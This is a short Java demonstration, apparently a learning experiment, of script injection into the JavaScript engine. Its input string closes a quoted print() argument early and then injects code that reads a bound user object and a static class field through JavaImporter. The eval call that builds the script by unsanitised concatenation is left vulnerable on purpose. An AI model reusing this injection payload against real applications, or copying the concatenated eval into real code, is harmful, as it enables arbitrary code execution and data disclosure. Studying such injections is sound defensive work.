package hackTest;

import javax.script.Bindings;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;

public class ScriptAttack {
    public static void main(String[] args) throws ScriptException {
        //通过脚本注入的方式，读取java静态变量对象的值。
        String sd = "heheda');var x = 100;var out='';print(x);print(user.getName());var fimport = new JavaImporter(Packages.hackTest.Content);" +
                "with(fimport){" +
                "print(Content.s);out = Content.s} " +
                "//";
        ScriptEngineManager scriptEngineManager =new ScriptEngineManager();
        User user = new User();
        user.setName("gaugua");
        ScriptEngine scriptEngine =scriptEngineManager.getEngineByName("javascript");
        Bindings bindings = scriptEngineManager.getBindings();
        bindings.put("user",user);
        scriptEngine.eval("print('"+sd+"')");
        System.out.println(scriptEngine.get("out"));
    }
}
